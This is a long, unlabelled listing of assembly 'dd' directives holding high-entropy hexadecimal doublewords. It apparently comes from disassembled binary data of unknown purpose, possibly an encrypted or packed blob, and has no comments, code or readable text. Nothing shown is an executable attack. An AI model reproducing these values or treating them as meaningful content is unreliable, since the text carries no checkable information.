dd 6D841289h, 35B8DFABh, 0B4703CFCh, 0D5594EEDh, 0B3C27F25h
dd 9CDEA773h, 63179711h, 0BE24851Bh, 0D842AFE8h, 0DF535BD5h
dd 15FA7933h, 12F42E4Ch, 7CB1039Fh, 3B820E94h, 0C7762DE6h
dd 0B0B16FC4h, 0A2DF4958h, 18E9B162h, 9C3DEB34h, 0A2018910h
dd 0F100B8F2h, 0CD3F0232h, 37B94840h, 10C1C46Ah, 7B2E9A8h
dd 31FD0682h, 0E68C1A9Dh, 0E3A17FB1h, 59F25947h, 6CC3C37Fh
dd 0AD59FB2Fh, 8260BE01h, 0CB058315h, 0B71E6622h, 57ECA07Dh
dd 53D1DF4Bh, 3955F7BFh, 1C630B97h, 0E1970C86h, 359525BBh
dd 65910775h, 4AD8C649h, 9B5DCBDDh, 0B57BBFEFh, 0FC009A19h
dd 0AD198C3Eh, 50FCB071h, 5424EF7Dh, 295DCFFDh, 0CE591387h
dd 47805E92h, 0CB154CDh, 79B35647h, 47A1C1B0h, 0A172DBD0h
dd 0F5772AF6h, 8921493Ch, 8118B909h, 14289636h, 7132FF0Dh
dd 0C573D3DEh, 0FD4143E1h, 25A15BA6h, 17E018EFh, 5A8503A8h
dd 3DA8FEA6h, 0B44836D6h, 0AB30D33Ch, 0DCC94783h, 6565C217h
dd 6E7ADA2Fh, 8160804Fh, 0A97B95CBh, 336DFE2Ch, 3EFD7EE7h
dd 33C70B5Fh, 4931E314h, 8C6E62B7h, 508CA18Fh, 33C54A9Ah
dd 9B722EFFh, 0D2C578Ah, 0B7A8E13h, 0AA75902Fh, 38F42985h
dd 2D4D4262h, 0D43D31E3h, 40A5AA0Fh, 6CB848B3h, 1229F9E7h
dd 0FE25E5F3h, 0A0D5729Fh, 3EEB363Bh, 60ADC865h, 0E459F78Dh
dd 0A354CA05h, 68E4192Bh, 875D5272h, 81C314Ah, 85B5FA0Ah
dd 0D77DE234h, 2818CA1Ah, 9F59DE3h, 10F56A5Ah, 7B40451Bh
dd 0B36F4D74h, 941C7A36h, 749A579Fh, 1441F648h, 37921D23h
dd 11715B88h, 0BFC88A6Fh, 4C31855Ah, 67E2116Fh, 0AC4C852Ch
dd 0CDF53ACAh, 1CC2BE84h, 0D7FF6AD7h, 41B2415Ch, 90651F53h
dd 0E725C6DEh, 0DB887DEAh, 981EE73h, 0ABAA65A0h, 0E9C2E96Ch
dd 882D225Fh, 895843C3h, 70C550FBh, 897CAFC8h, 589D8F69h
dd 0E5581AC2h, 7F646BEFh, 9C947ADEh, 0CC894517h, 31456B9Ch
dd 1238EA0Fh, 4444C69Fh, 0B83D32A7h, 1744AF6Eh, 0A951A05h
dd 7254FB14h, 18ED22EDh, 803993D1h, 33C520AFh, 0BD72AFFh
dd 58878682h, 33694353h, 806FACFAh, 0B661F28Bh, 0C28E5F57h
dd 0BBB85422h, 14D6553Ch, 0AC549324h, 73958293h, 1FE96EF3h
dd 0F0D6410Fh, 4E34BB17h, 83ADE22Dh, 0E45892F9h, 0F88F416Fh
dd 8F71E67Ah, 0B89639BFh, 927A0598h, 47B0CE5Eh, 9ECA6329h
dd 3F028514h, 0FAAAA68h, 3AB13A03h, 46C3175Bh, 0C8284DD8h
dd 5729EE86h, 759ED65Bh, 0FC01C31Fh, 22EE355Ch, 4E9E1904h
dd 0B945622Fh, 26F2A5ECh, 91F50A9Dh, 0F9C90ED3h, 0BE5F1BBDh
dd 0DF1123C2h, 1E8B17BEh, 403CBEE3h, 19672287h, 0AC6740CEh
dd 3B9F0567h, 14690626h, 0A1089A5Fh, 0FC1ABF46h, 0C2B0A9B7h
dd 0E7D95EF5h, 708D6E93h, 0C48E2F4h, 0B45C92C7h, 0B4094C9Bh
dd 813152EBh, 495E164Bh, 0E8CDF787h, 80F402E8h, 0D064EE6Bh
dd 0AC7B969Bh, 0B83D364Fh, 0FB7833h, 0F56A0D1Fh, 7C814367h
dd 0DF60ABC4h, 0A4195F87h, 0B2AF5BFEh, 0A4B04C6Ah, 589DD207h
dd 0A8DC7101h, 5675BA4Ah, 0C715200Eh, 0AC255607h, 13B93E22h
dd 30811EF0h, 93D186D9h, 38CB5A72h, 546C37F3h, 0B4360CABh
dd 5655BD7Bh, 5FFCF037h, 28CC6115h, 0A9058A5Ah, 5C0426FEh
dd 0E4C8ED11h, 0B9898E26h, 57E7FE68h, 0D179D2A1h, 680C4600h
dd 44CAD5E3h, 0A3BC7AA5h, 7CC116B0h, 68EDE277h, 0B0BC51E1h
dd 61159AAAh, 0FC43FEAFh, 0EC191D77h, 3C0C210Bh, 6345CA19h
dd 7A293344h, 5A4052C7h, 4A490ED7h, 6F40FF5h, 965DB80h
dd 312E8297h, 0D4392B2Eh, 41262ACFh, 6883F90Dh, 0E7F5FDA7h
dd 1B69EE72h, 20548ADBh, 863F36ABh, 86B32C2h, 0E0D61EFDh
dd 70854BEEh, 79D1587Bh, 665CD436h, 0F34707C3h, 4FBE78CAh
dd 93A0508Dh, 82DC0C3Ch, 572FAF63h, 0E6757FB0h, 9748C6DBh
dd 67B83D66h, 0D9A92E33h, 2088F89Ah, 14C11CEBh, 48ED62FBh
dd 31E60DD3h, 0B0853CBFh, 0CCB12A06h, 0A718DD07h, 1D498E53h
dd 0C075FACEh, 0CE31E80Ah, 2D42541Eh, 44B93E86h, 0BCAD6C8Ch
dd 0E8DE8BE7h, 78FD727Eh, 679C4ECFh, 0AFEF2673h, 3C81BAAEh
dd 28A00F37h, 0D979BE63h, 8460AD4Eh, 0B0DD990Eh, 59216767h
dd 5CA9316Dh, 71C0CE4Bh, 2C22E84Ah, 1D226DADh, 7BBEB88Bh
dd 0EAD465CFh, 2C91610Bh, 0C7EF50D0h, 941C1226h, 0B0D5E99Fh
dd 1411A63Bh, 0C86DE27Eh, 4AEEB147h, 5424E543h, 6CA459BBh
dd 1D1D12B1h, 47FF7A13h, 0A70F336h, 4DE1163Dh, 28CF82BFh
dd 9268EF23h, 0B4B0D5DFh, 6151466Dh, 0B866F1F2h, 0DD5ABE73h
dd 7205CB0Bh, 29FEE7FAh, 886D17DBh, 9BFD1A44h, 30B0767Ah
dd 8C329EFBh, 18C8E54Ah, 77F04F93h, 0D47375ECh, 99F3571Ch
dd 8BE48F4Bh, 6B0A9111h, 87399E29h, 0C375A8F2h, 0FB6141D0h
dd 31DB5C46h, 5C32E71h, 13A80599h, 30A83E99h, 0D67632F3h
dd 0E4C578CAh, 0A9D6545Ah, 6BF29A73h, 0F44B8E27h, 0BE060A80h
dd 0EE11AF89h, 0C5247A38h, 27CB570Dh, 71C9CB68h, 1CFFFFA3h
dd 31B3728Bh, 0ECC925B0h, 0D1A263A5h, 36F85851h, 5AE8F162h
dd 0D669E463h, 0C135FF5Fh, 0A251C85Bh, 92702867h, 14C7875Ch
dd 72DCCC19h, 92BE3BFh, 680D427Fh, 697823E3h, 50A5777Bh
dd 39E6C3DDh, 0C7BDB267h, 941C3A26h, 0FFFD1B9Fh, 0E22BCA1Fh
dd 0FD3D57FCh, 88C0DE43h, 1A30A413h, 0B30F27DDh, 153E279Ah
dd 34FF4E6Eh, 4283F1FFh, 0B987F35Ch, 1BA7075Ah, 41B6BEE3h
dd 9065191Fh, 16178FA1h, 383BCEBh, 0DB8BEFC2h, 0A5D8D9B4h
dd 0BC41A31Ah, 0E22D48E7h, 0C04CE1CDh, 0F3850ADAh, 8F94287h
dd 5C35B9B2h, 0E7094E93h, 7F3579F9h, 9C949EDEh, 14C52A17h
dd 391019Ch, 8365EA4Fh, 0E34E85DDh, 2DC232F4h, 54E91BBBh
dd 9F696BF7h, 8F979E14h, 0C5129D08h, 0A4594D80h, 0B0C50147h
dd 89E2733Bh, 36AFE155h, 0F405C217h, 0F5E96F80h, 9689D6CBh
dd 0DF4D0257h, 2DCB4E50h, 51C3DE61h, 0F92ED6DBh, 78BD47AFh
dd 0A1BDEB7Ah, 91DA1A9Fh, 2461BBA6h, 8D24A277h, 0E419A805h
dd 6C90353Eh, 1F71A64Eh, 0D85D162Fh, 0D93C4313h, 59B5FA27h
dd 6A0D2B46h, 0BEE542D7h, 0E2068115h, 4D82EF08h, 0DC6E465Bh
dd 25D417A4h, 5929AEF3h, 0A008FD0Ah, 9615A66Bh, 9A6D8876h
dd 2499DC6Bh, 0D075AFh, 0C931E68Dh, 0BA680847h, 6993835Eh
dd 2AA77ABFh, 7B54DB0Dh, 7CCDC2CAh, 9569EEF5h, 0A4B0D5DDh
dd 0B451466Dh, 0CE516798h, 91AFEE33h, 2015A212h, 0BC0D5EABh
dd 0DB7A22B7h, 57925D8Ch, 3CC164DDh, 990E66B7h, 589DA75Bh
dd 0B40E2600h, 35B83ABFh, 0DCE10E0Fh, 14304F4Eh, 0EC79BE56h
dd 2F9A1C1Eh, 0AC11CA73h, 0F67465A7h, 0EC607Ah, 2CD91E31h
dd 0E05489EBh, 0CDED22C2h, 439D5143h, 23C50AAEh, 0CCB12353h
dd 9A285F07h, 0AD49CE4Bh, 0F66D47F2h, 8689D6CBh, 2BB2FDA1h
dd 48F229Eh, 94AAAA0Fh, 6CD18719h, 796D9E66h, 0FCBD6EF3h
dd 0A0D51BDEh, 97DA3D4h, 0CC2CA277h, 0E4599FD3h, 9AD1413Fh
dd 198EB47Bh, 0D81D245Bh, 41D00E96h, 133DD232h, 0C9DE96CBh
dd 684D772Bh, 397A9C08h, 50A577A6h, 0A1B8331Bh, 78A0DFA2h
dd 41D6FEB3h, 0E055EC97h, 784E36EEh, 0C86DE34Ch, 0AF959E88h
dd 0BF75752Fh, 0C2CCF3Eh, 0D5989487h, 75C94EEBh, 419F7A95h
dd 891E5461h, 288DB4C3h, 0CBC64620h, 9024380Bh, 79DC955Bh
dd 0F83DEF02h, 473BFE19h
dd 16510FA0h, 7C84B6EBh, 88DFA7B8h, 0D9541EC3h, 70C55769h
dd 0B0196E4Ah, 30226D3Dh, 0B4094E07h, 9D311E1h, 23F5327Fh
dd 0A8B85A82h, 90C47363h, 6165AA52h, 568C2E9Ah, 0FCB6CD58h
dd 0B4683E17h, 44D15117h, 7421B7EFh, 40C926FCh, 0A41CB6D3h
dd 9EE00AAFh, 9BB15E0Dh, 2DC947F8h, 30CA8E13h, 0C6323C73h
dd 1DF45BABh, 0C24D424Ah, 44985623h, 43F7AA0Fh, 5AC11324h
dd 47072A7h, 6BBE7AD7h, 0E0E0424Ah, 485F02Bh, 8C7E23Dh
dd 1B0AC913h, 0B033DAFAh, 197E57Bh, 9840B0FAh, 5C89A413h
dd 0B5BA33h, 0C9DEC59Ch, 684D7487h, 84F972DEh, 0DDA81FCFh
dd 6CA708AEh, 75303F27h, 0FF29EE8Bh, 0B115B051h, 69BEA53Dh
dd 0C82DD47Bh, 5A992680h, 0CECE1B00h, 7A7F1336h, 95AD52C7h
dd 64BCA021h, 0BA0D929Fh, 6E80A9F4h, 0A5C461C0h, 2ED2BFD4h
dd 5E0EE504h, 0DA1FBBD6h, 5C8EF227h, 0AD8219F4h, 20C0650Ch
dd 3C01F69Dh, 0C838550Ah, 4EAD1FC3h, 70F07A87h, 0B06499FBh
dd 0D8DDD2F2h, 0F431032Eh, 91413ABFh, 0C1C8938Ch, 0E88DC257h
dd 81BFFE63h, 0D025D202h, 52472F9Bh, 3DFACD58h, 54E93BB3h
dd 0E0955A1Fh, 7CC5B4B6h, 68A268FAh, 0CA7631EDh, 90A3658Fh
dd 0A9D74F57h, 38D2F226h, 9124E727h, 0E01A8E5Fh, 0F90DB3E8h
dd 0DC2C7035h, 4EB41F46h, 30858A2Fh, 1FF1C9FBh, 1D901F92h
dd 0F58E4E81h, 0CEB07EADh, 6E8B3B0Ah, 66C8CE52h, 973CF237h
dd 0D07CA61Ch, 0FC018713h, 0B63C323Eh, 4CECEE77h, 74D6DF4Fh
dd 7055F8AAh, 97931B7h, 0EA901A8Dh, 7DC550A8h, 4DC64C16h
dd 51D5D153h, 0B509C9DDh, 8435B6F3h, 9D618F0Ah, 0A64D8619h
dd 50F1B96Ah, 5F23AA03h, 3E5786C9h, 0FC7337EEh, 54802EA0h
dd 349C1B88h, 4BEB5B31h, 4DBFE7BFh, 0A14BDF83h, 0E54A53AFh
dd 9E372677h, 9C13970Eh, 5749D100h, 130F730h, 9C75FF8Bh
dd 0FC0D51DEh, 45BC73AAh, 57F103CFh, 6D9D4688h, 55FCF7B3h
dd 738D4A99h, 544CD78Fh, 7AB53F04h, 6D065B07h, 0F2668BB8h
dd 0A3A49460h, 1DEB2381h, 13646580h, 0F2BD3D09h, 57C7120Fh
dd 0E56C31ABh, 24213E95h, 0CAE03441h, 87658CFh, 0CCB126E3h
dd 189DD207h, 0F4498E53h, 0C075FA7Fh, 9C61D68Bh, 0A84D0257h
dd 44B93E23h, 10A5AA0Fh, 6CD186DBh, 78FD72E7h, 94E96EF3h
dd 0A0D51ADFh, 3C81362Bh, 8ADA237h, 0E4599E43h, 0F005CA6Fh
dd 8C71E67Bh, 5018E547h, 910AAE52h, 0F58399h, 0F68415CBh
dd 680D02AEh, 90BAC9ECh, 5FFD3942h, 2F970DACh, 1CF939F7h
dd 0D86B8597h, 0A22EC3EDh, 77558563h, 8A46F635h, 820C570Fh
dd 0B945CA16h, 0C080C3Eh, 1B18B987h, 0AD2B2611h, 40F1B89Eh
dd 3E16D383h, 4C258297h, 0AC39BEA3h, 90252AAFh, 0CE7583D6h
dd 0C124F227h, 97659A6Bh, 0D7B79E9Fh, 858F3354h, 7FEE22F7h
dd 93541D1Ah, 93850ACDh, 0F08199EBh, 0B05E9248h, 3DFFAC97h
dd 0C0171E22h, 0DC9B954Bh, 0DAA6C763h, 89698C60h, 8B3D1601h
dd 0AC2B45C5h, 8AC236D3h, 26562DD8h, 9FC2B20Fh, 0B2EA8914h
dd 7147EFDCh, 0A7415EC3h, 3F063EE4h, 8C88B4BEh, 96181507h
dd 0F449CE6Ah, 2875FA7Fh, 9C61D6B7h, 91C387DCh, 31513E63h
dd 0F85A55F8h, 6CD186C3h, 4173CF64h, 0E1E96EB3h, 4893D7h
dd 0D7817609h, 86205DABh, 2759DE7Ah, 0C9974FE0h, 19F8E63Bh
dd 0D81D2BC9h, 3489CDFBh, 0C37C893Fh, 5CA10540h, 805F4297h
dd 7B06800Eh, 694FFFCCh, 0FA92465Bh, 38B1C8A4h, 0D52E2ABCh
dd 9A96DA9Fh, 784EF67Bh, 0C86DE28Ah, 74959C88h, 0CFBB42C7h
dd 0E6B4A544h, 9B1D12BEh, 7C435E15h, 34F5837Fh, 3218D612h
dd 0C38D81A3h, 0C5713552h, 4FFACB0Eh, 15D0D984h, 0F831BE23h
dd 3F300206h, 0DAAC1997h, 0BCB639A4h, 94B22B7h, 56EAE0BBh
dd 702ECFE0h, 8FA766FBh, 5DA892FDh, 5F190418h, 833FB1BDh
dd 0AE4947BAh, 0EB723DE9h, 444054D6h, 10E0474Fh, 281E3DE3h
dd 0B83D3223h, 6D039BCCh, 88C55A5Fh, 833E88BEh, 7147E7F4h
dd 21965EC3h, 0B0853305h, 9F952238h, 2B9F1284h, 0FCFF8188h
dd 9F5E89Ch, 0B8A085ABh, 0B4640673h, 60B51707h, 0F94EEA54h
dd 0BBDE7D5Ah, 4689AF5Ch, 0D1419572h, 96A1C1B1h, 7D8CDAAh
dd 26D95D96h, 0C68F65C2h, 0D67166DAh, 65E21DFAh, 0C629E11Fh
dd 0DDF43592h, 16C14967h, 63676D4Ah, 6679A3B2h, 0BBC98562h
dd 56918BEAh, 1503D3E4h, 0D1E6B267h, 2BD651C2h, 0F4D759C1h
dd 3BF1982h, 0A26C2188h, 31718607h, 0B8BA75D9h, 0C15772Eh
dd 0A9A53487h, 0B42B0CCBh, 0A2F7791Bh, 1A8BFD6Dh, 0DD376A8Fh
dd 6BA415Ch, 0FAF4AD87h, 1B95E5Eh, 78820D92h, 1F1AED89h
dd 0A557CAEFh, 0BC41927Ah, 0E20AC91Dh, 0E47346ABh, 68F04915h
dd 0C119774Bh, 0E0226D32h, 0B4094E92h, 8D41E83Bh, 165FF69Ah
dd 0ED6634FCh, 479FEDBh, 6F8741CFh, 90AC4B58h, 4F3D7293h
dd 149D1FB6h, 60955A1Fh, 0CCC2026Bh, 0CD1AC897h, 0A4596AB2h
dd 0B1C50AACh, 0CC47A234h, 4D25D207h, 5FA162D8h, 56C873D4h
dd 2C6196B2h, 5FE6A8BFh, 48D0FA6h, 10A5AA0Fh, 0F66C0FDAh
dd 0CFD32DEh, 0A56C99B8h, 0A0D55AEBh, 8483362Bh, 3E52C650h
dd 83E19B36h, 5B2B410Bh, 8C715E1Dh, 0DB29B921h, 0C32393A3h
dd 40818BBAh, 5C2196CBh, 580FA9Fh, 928C7EEBh, 64D4EF38h
dd 2C91465Bh, 0BB05B627h, 0A029A676h, 0D96629Ah, 0B3EAF693h
dd 0FC5C6780h, 249ADE43h, 34318A2Fh, 0E79B4F0Bh, 0A18BD70Ch
dd 0BB420E93h, 87CB2D4h, 2D64A1F7h, 2BCDC2E3h, 0B039BEA3h
dd 0F44292D0h, 51D830A4h, 0F83DCBF9h, 146956D8h, 98FEFE38h
dd 0BC019022h, 7690CA1Ch, 4469E13Ch, 8F798507h, 6AC88504h
dd 3EC86D7Fh, 3FA2DF38h, 0C0010B2Ah, 2B73E14Bh, 0E88DC1D5h
dd 0EC6D8B63h, 2F9A14D8h, 5F9D92Bh, 0DEC2CD5Bh, 32BCD18Bh
dd 0EB3ECBB4h, 0E244FD24h, 63ED22CEh, 5851D74Bh, 84F48F58h
dd 0CCB5267Bh, 0AE9D207h, 0A89A7EBh, 0C8CD51B7h, 3765A24Bh
dd 43B577EFh, 0C14E9544h, 10E59E3Eh, 6CD186D3h, 0C57D3892h
dd 94A95ADCh, 18946EDFh, 0F5A82E02h, 3C86073Dh, 999E03h
dd 0DBA0C06Ch, 2771A64Fh, 52F7A3F7h, 74BDE196h, 4005103Fh
dd 680A13C1h, 0EA742D7h, 73049C5Bh, 10D15B4Ah, 2C91561Bh
dd 88BAC627h, 6C4F04FAh, 4B7326EAh, 0CFEB1EDBh, 75E449B7h
dd 24D9E781h, 4740FD8h, 4C11A6FBh, 91685287h, 0F1C35663h
dd 40B54ED6h, 9D5930A1h, 19487517h, 8439FE97h, 0E4252A8Fh
dd 0C4958658h, 0CC54576Dh, 0BF0FEE33h, 19D327D6h, 4BAAB6EBh
dd 0C8191332h, 64D91EC3h, 0C08C3FAFh, 257464ABh, 0F2DDD2F3h
dd 8038CB64h, 80B53AFFh, 0D7D4164Bh, 6D877AA7h, 439CA49h
dd 0B65801E5h, 5B09F723h, 0F8090322h, 54A82E33h, 0D0972E1Fh
dd 56647CC2h, 88ED22C3h, 1135D67h, 0B0853E85h, 74D78D5Dh
dd 9D6A2286h, 0F409BA62h, 0C075F87Fh, 54D5D4FEh, 9C67A75Dh
dd 0EFDF3E63h, 29071786h, 5069869Bh, 0D3FD72C3h, 0A0D8EB04h
dd 0A0DD1A9Fh, 50F5362Bh, 3C9C27C0h, 0E0599E03h, 0FB70CA6Fh
dd 97B5ECBh, 0D81D266Ch, 0C3C425B9h, 40818BBAh, 5C2996CBh
dd 0E1C3797h, 8E19FD5Bh, 10D1416Ah, 1F3A201Bh, 2D5618E7h
dd 0CC0016D5h, 0D43E7F95h, 1881F62Bh, 0E3C8E874h, 42999E37h
dd 1C07D84h, 4C31E68Fh, 0FE1D5297h, 98F6Bh, 4831FAFCh
dd 28CAF301h, 83AB8297h, 0EBBC08ACh, 3B256ABBh, 0D86083ACh
dd 0F87DF227h, 1D1DAE73h
dd 0A557CAEFh, 0BC418282h, 0B9A8D51Dh, 64D95EF7h, 0C0854ACFh
dd 8F3137Dh, 0A6921FC3h, 8020EB19h, 0DBC3AFFh, 0DCE12FC1h
dd 140D6971h, 0B47E8B66h, 2F2A6A4Fh, 29E66CDBh, 0B87D0696h
dd 54A96E33h, 51F3E279h, 5575749Eh, 505DC991h, 9032DB89h
dd 50050AEFh, 44018C38h, 2CAC57F0h, 74498E13h, 0C200FA7Fh
dd 39EB503Bh, 0A80D367Eh, 0B8399545h, 0A0A2DF0Ah, 939E06DBh
dd 0FD0AD8A7h, 94A95AC2h, 0A0D41ADFh, 7C313D5Eh, 3C84273Dh
dd 0FF39E03h, 73BDAC60h, 0A5D4ECBBh, 0BE5D5273h, 9E887EB8h
dd 34843FC8h, 5C21968Bh, 47784295h, 0B0C8FB14h, 50E56A8Fh
dd 36E4461Fh, 0BDB77297h, 0D4699A98h, 0D4257F15h, 1C80F62Bh
dd 0AED58467h, 24297582h, 70F582C4h, 781A23B1h, 6FB752C7h
dd 34FD3F56h, 48F57AFFh, 7AF1230Bh, 2225016Fh, 840D9406h
dd 208E4C8Fh, 5C59ED5Ah, 0D2F8F82Fh, 0BE69AE47h, 14641FA8h
dd 0BC01B6EBh, 0FD9C22A7h, 0DCBF3BB6h, 0D58FB26Ch, 0CB152D1h
dd 98EE39A1h, 3EB46739h, 77357A86h, 9C9527CEh, 0C88DC217h
dd 0B5668B63h, 0B67E0138h, 0A609CF23h, 0F8091802h, 574DEE33h
dd 54BFFF15h, 0D7A776ABh, 7167DFDEh, 65935EC3h, 894FAF25h
dd 67D7267Bh, 9D9F8AB7h, 0F409BA7Ah, 0F1F00DD5h, 9F6196BFh
dd 0A74C0257h, 44B9B9A7h, 74C2120Fh, 0E15AA050h, 78BD46D6h
dd 94E99F72h, 612218DFh, 3F81362Bh, 6F15A742h, 4F771927h
dd 0F005CAD7h, 0F9DA807Bh, 53E57441h, 8C22A8F6h, 63ADD5Bh
dd 3AE1A560h, 5988B53Ch, 84F93ED7h, 25E46ACFh, 1D14B15Bh
dd 38BDF213h, 0A021AEB3h, 6DADBCB9h, 0CDC40107h, 0C86DA243h
dd 2B9BDE03h, 0D14F4BBAh, 85B50DDDh, 207B5AF2h, 0DFAF0AF7h
dd 48456914h, 7AEFBDA1h, 2A90DA6Fh, 840D9526h, 7B8E4C8Fh
dd 4698B658h, 0CC4C7790h, 1469EE33h, 211A5Fh, 392BB11Bh
dd 886D169Eh, 69C3FE02h, 70A14266h, 38D8C3F9h, 0BC1D9287h
dd 0B0CDCE90h, 2A548A14h, 3C5EAE2Dh, 0DCA4671Dh, 0AF1FFE23h
dd 0E4546FB8h, 0AC31C6DBh, 0EB4932A7h, 6098ABC4h, 60955A5Fh
dd 71B556EBh, 48EEA500h, 0A16D5E83h, 5B6F9A1Fh, 4776ADC8h
dd 58A4508Ah, 7D88A553h, 98C5063Eh, 0A8485381h, 5FE70217h
dd 48D0FA6h, 50A5AA0Fh, 0ADDF2DBh, 723E225Fh, 0D4DD4776h
dd 0C6DFF1DFh, 3661C993h, 48998B92h, 13F2F843h, 0B031FBEAh
dd 8C71E57Bh, 2F2E6646h, 74BDFF96h, 0B5BA3Fh, 0AB2CE2EBh
dd 680D4150h, 34FC0AE3h, 0A30EC05Fh, 0A91A8990h, 38FD8BBDh
dd 9CA06698h, 17DCE963h, 0BC75C7EEh, 486DE277h, 0A997AB03h
dd 7071A3AAh, 0C392CBBh, 0EB1EAB07h, 0B9CD832Bh, 40E55EBBh
dd 0ACE9B6CAh, 2E2E295Ch, 40806C5h, 284381E9h, 543986D4h
dd 0FA7DF267h, 4CC28892h, 559C1FF4h, 8DB9D0ADh, 38864477h
dd 0E154B400h, 70C57ED3h, 38C0E30Ch, 58DD9287h, 0B27C5E93h
dd 0D8CD11E8h, 8F2A0FA0h, 0C375E93Fh, 0A6F475B3h, 0D165AA76h
dd 0EC28440Eh, 330433A7h, 0DDAD0A77h, 208537A2h, 0FA7CFDEBh
dd 63ED22CEh, 0E420DC06h, 8140FDAFh, 8CB1660Fh, 6C9DD207h
dd 5F917951h, 9675FEBDh, 32DC55DCh, 0A84D426Eh, 4560BA2Ch
dd 1D4DAA0Fh, 27D186DBh, 3DB320A2h, 0BADB5DBFh, 0A099569Bh
dd 909A3D4h, 8D24A277h, 0E419A7FDh, 0CC5D413Ch, 0FF8E3E78h
dd 0EC1E996Fh, 0CB7F32FBh, 0A62031C0h, 721D6F2h, 0E1010094h
dd 0C4C0BC66h, 58A769CFh, 1557C392h, 4B36B267h, 549A519Bh
dd 815DA9Fh, 3BE00BEh, 0F1CB5FFCh, 0CCCFDE43h, 0CFBA7CE6h
dd 75973330h, 0D29652C7h, 78830DDBh, 0A976B4D4h, 7C69590Eh
dd 27CD82D6h, 0C438E427h, 3A90298Fh, 0EF514662h, 0B84480D2h
dd 0FC554273h, 20F71F50h, 0FA8CB6ABh, 0FAA809B3h, 67D95EFAh
dd 0F66D1AE9h, 8F0E990Dh, 18E4347Ah, 0BF7C4E93h, 8F397D84h
dd 0DCA00DC8h, 0D1812917h, 444058F6h, 0DDE0E54Fh, 0AF11C69Ah
dd 0F8044022h, 6C284833h, 0E59A7FE0h, 7CC17617h, 63EF227Ch
dd 4C496AC0h, 4F3AFCE6h, 0F5179B02h, 9D92D247h, 0F4498EB7h
dd 0F9DF7F7Ch, 1962D6CBh, 0A80D3B25h, 3923EA8h, 0DD27A503h
dd 57D186DBh, 0FBF27AA0h, 94E96E37h, 0A3D7DA5Ch, 0B982226Ch
dd 8ED9B45h, 51A6CE11h, 0F045F3D1h, 0B9397384h, 5D071207h
dd 830CC1D3h, 0E9B5BA3Fh, 5C219657h, 0ED02BDABh, 84F97E77h
dd 5FF0544Fh, 2C91CD9Eh, 39FB3927h, 841DED98h, 1FE00277h
dd 5AFCCF94h, 0BD6DA24Eh, 8E1CDD74h, 3345CA16h, 0C08D43Eh
dd 5298DB87h, 0FFC94EEAh, 827041FFh, 6EE11632h, 0EE48B9DFh
dd 0B639FE9Ah, 902517E6h, 0DB23765Bh, 0F87DED8Fh, 0E8276373h
dd 227E5BD4h, 8711F4A8h, 0C814E832h, 0E7D56BC3h, 417A5A2Bh
dd 10D52274h, 9BC679A6h, 8D9BCB1Ch, 0B553AFFh, 9C9864FEh
dd 1EFB2A17h, 0AD18019Ch, 5065EA4Fh, 0EB3AC8EEh, 833440ABh
dd 0D6A62674h, 9F6AA523h, 0CE4479A2h, 0C3129D09h, 3987ABFh
dd 0B0C52E9Eh, 0B34ED9C4h, 521CEEECh, 0F449EE77h, 46B49Fh
dd 1B45DA00h, 0E874ACD2h, 7100B323h, 13A5AA2Bh, 2CE8F45Eh
dd 0DD5814E7h, 972F45BDh, 0E2FE0E9Dh, 0C7C7F027h, 5A2C65DFh
dd 0E1599E43h, 7905CA6Fh, 0D22E1A3Dh, 96E89F84h, 62898E2Bh
dd 35C92FC0h, 0A4A2968Bh, 0D3894D68h, 0DF97EE3h, 10DC384Ah
dd 7A912C1Bh, 0D0927D8h, 14ACAEF3h, 0E0B15E90h, 3C6AF66Bh
dd 0CB07B227h, 4C98B453h, 0F0458A2Fh, 10A459EDh, 1B1D12B2h
dd 0F0C6F12Bh, 40F57FC1h, 25B7D382h, 0A5408297h, 0C47987F9h
dd 0A947BF02h, 0BE00061Bh, 72DF20Dh, 545C6AE6h, 0DFAD195Fh
dd 0B90D32A4h, 884722B7h, 5D8FAB3Ch, 0E57A4AAFh, 0CB1537Bh
dd 57226A44h, 0B40DBB17h, 0EAB0B3BFh, 0EFA15672h, 0B94EC1DEh
dd 13AF33h, 86D0151Eh, 531186A2h, 0F8085232h, 5B69AB33h
dd 60918B9Bh, 0F50845EBh, 8D40C72h, 0F5480F83h, 0BFC515C7h
dd 594E763Bh, 18DDE7A7h, 70464ED6h, 0C075FEF5h, 0A5135302h
dd 108E0217h, 44B957EEh, 0E79DE184h, 2CE5B75Eh, 78FD72E7h
dd 97EF1BE3h, 0E0C5775Ah, 3F53052Bh, 0FF5C55F6h, 9EDC17A2h
dd 48058A56h, 8C71C240h, 0DB6159CCh, 7499A396h, 367893Fh
dd 0ABD0610Ah, 1E88CB76h, 47F93EDAh, 56AEDDC0h, 0A1A4A5E2h
dd 8FB2AA74h, 42ABAF0h, 0C8D4B1D6h, 0C6C02668h, 0A6049528h
dd 0A784AAFAh, 42448655h, 707A2D5Bh, 9B09100Ch, 30441E91h
dd 990285B7h, 99DA9728h, 288DBBBDh, 0E06D3560h, 1FE5199Fh
dd 0EC51BED9h, 37F63167h, 0A9E4E598h, 2015A211h, 8FDE3D57h
dd 0E9118E7Eh, 1EE518B1h, 50A94898h, 78AD5A51h, 2CF3AE2Bh
dd 0C109724Eh, 0BFCD957h, 84E42B4Ah, 0E3F9C252h, 563AAD5Eh
dd 0E3E0E54Fh, 27EE3964h, 0F16A0FA4h, 0D0A66D7Dh, 9F6AA539h
dd 298221D6h, 53696DB9h, 99E6A17Ch, 82F649F8h, 33A1A234h
dd 48A02DF8h, 0FB06DA00h, 3F8AFFFBh, 74BAE574h, 57B2FC7Ah
dd 0BA41BA2Ch, 0C29655F0h, 6CD19033h, 87929AE7h, 9401910Ch
dd 0FDD51ADFh, 130BDBAAh, 3544A277h, 80599E40h, 458EF890h
dd 8C31DF09h, 0BE7F9B23h, 6EC4F092h, 3933F30h, 2AA96CBh
dd 0ED341ABh, 0C1A94562h, 53F3EFC0h, 6F66461Bh, 389DB231h
dd 0DDACA1B3h, 1615DA9Ch, 7743AA28h, 4C62C239h, 2499DCFFh
dd 0C9C486CCh, 4C31A7BAh, 9AF3D488h, 0B9210ED3h, 4F0A8501h
dd 1CE3B589h, 388709D7h, 7C35F4A0h, 90242A8Fh, 6BFEE0Ah
dd 6D4D0D98h, 1429DA5Ch
dd 9565BAEEh, 0BC41829Bh, 41D302DDh, 8CCD669Bh, 8F7AA03Bh
dd 98FEB47Eh, 693F4105h, 0F43D7F06h, 0E8D0D1BFh, 0DCA1164Dh
dd 0E88BAA4Eh, 0EC21FE63h, 2F9A00FBh, 98384311h, 3CBB32E7h
dd 149D0719h, 4910D21Fh, 9EC136DFh, 79689517h, 0AC191EB7h
